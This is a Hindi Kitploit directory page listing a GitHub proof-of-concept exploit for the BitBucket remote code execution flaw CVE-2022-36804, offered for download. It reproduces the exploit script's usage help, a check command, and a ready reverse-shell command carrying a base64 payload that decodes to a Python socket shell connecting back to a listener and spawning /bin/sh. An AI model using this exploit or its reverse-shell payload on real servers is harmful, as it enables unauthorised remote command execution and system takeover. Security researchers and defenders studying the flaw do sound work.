Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-36804 — BitBucket RCE CVE-2022-36804 के लिए एक वास्तविक एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/notdls/cve-2022-36804
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubnotdls/cve-2022-36804

CVE-2022-36804

BitBucket RCE CVE-2022-36804 के लिए एक वास्तविक एक्सप्लॉइट

रिपॉजिटरी देखें
35712 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-36804 PoC

इस रिपॉजिटरी में हाल की BitBucket रिमोट कोड निष्पादन भेद्यता (CVE-2022-36804) के लिए एक सरल प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट मौजूद है। इस भेद्यता का शोषण करने के लिए लक्ष्य इंस्टेंस पर एक रिपॉजिटरी तक पहुँच आवश्यक है, यदि आपके पास क्रेडेंशियल्स नहीं हैं, तो लक्ष्य में सार्वजनिक रिपॉजिटरीज़ होनी चाहिए।

उपयोग

root@kitploit:~
usage: exploit.py [-h] -p PROJECT -r REPO -u URL [-c COMMAND] [--proxy PROXY] [--session SESSION]
                  [--check]

Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)

optional arguments:
  -h, --help            show this help message and exit
  -p PROJECT, --project PROJECT
                        The name of the project the public repository resides in (E.g.
                        testproject)
  -r REPO, --repo REPO  The name of the public repository (E.g. testrepo)
  -u URL, --url URL     The URL of the BitBucket server (E.g. http://localhost:7990/)
  -c COMMAND, --command COMMAND
                        The command to execute on the server (E.g. 'curl http://canary.domain/')
  --proxy PROXY         HTTP proxy to use for debugging (E.g. http://localhost:8080/)
  --session SESSION     The value of your 'BITBUCKETSESSIONID' cookie, required if your target
                        repo is private. (E.g. 3DD8B1EBA3763AD2611F4940BD870865)
  --check               Only perform a check to see if the instance is vulnerable

उदाहरण

यह जाँचना कि कोई इंस्टेंस असुरक्षित है या नहीं

यह जाँचने के लिए कि कोई इंस्टेंस असुरक्षित है या नहीं, आप निम्न कमांड चला सकते हैं

root@kitploit:~
python3 exploit.py -p PROJECT -r REPO -u http://target.site/ --check

रिवर्स शेल स्थापित करना

नीचे दिया गया कमांड पीड़ित पर रिवर्स शेल स्थापित करने के लिए इस्तेमाल किया जा सकता है (base64 पेलोड को आपके लिसनर विवरण के साथ अपडेट करना होगा)

root@kitploit:~
python3 exploit.py -p PROJECT -r REPO -u http://localhost:7990/ -c "echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC42Ny4zIiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIikn' | base64 -d  | bash |"

श्रेय

  • TheGrandPew - बग की पहचान करना और रिपोर्ट करना

अस्वीकरण

यह एक्सप्लॉइट केवल शैक्षिक/शोध उद्देश्यों के लिए है, मैं इस बात के लिए ज़िम्मेदार नहीं हूँ कि लोग इसका उपयोग कैसे करेंगे। अच्छे रहें :)

टूल डाउनलोड करें